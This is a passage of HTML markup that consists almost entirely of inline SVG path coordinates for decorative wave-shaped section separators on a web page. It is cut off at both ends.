d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 